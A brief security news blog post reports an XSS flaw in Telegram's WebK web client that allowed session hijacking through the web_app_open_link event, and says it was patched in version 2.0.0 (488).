Hijack sessions with Telegram Web App vulnerability – be aware

April 29, 2024
1 min read

TLDR:

  • A vulnerability in Telegram Web App allows attackers to hijack user sessions
  • Telegram has patched the vulnerability in version 2.0.0 (488)

A new vulnerability in Telegram has been discovered, allowing threat actors to hijack user sessions through XSS. This vulnerability affects Telegram WebK versions below 2.0.0 and also users of web3. The vulnerability is triggered through the web_app_open_link event type, allowing attackers to save a victim’s session ID and hijack their session. Telegram has patched this vulnerability in version 2.0.0 (488) by adding code to prevent exploitation. Users are recommended to upgrade to the latest version to prevent session hijacking.

Latest from Blog

EU push for unified incident report rules

TLDR: The Federation of European Risk Management Associations (FERMA) is urging the EU to harmonize cyber incident reporting requirements ahead of new legislation. Upcoming legislation such as the NIS2 Directive, DORA, and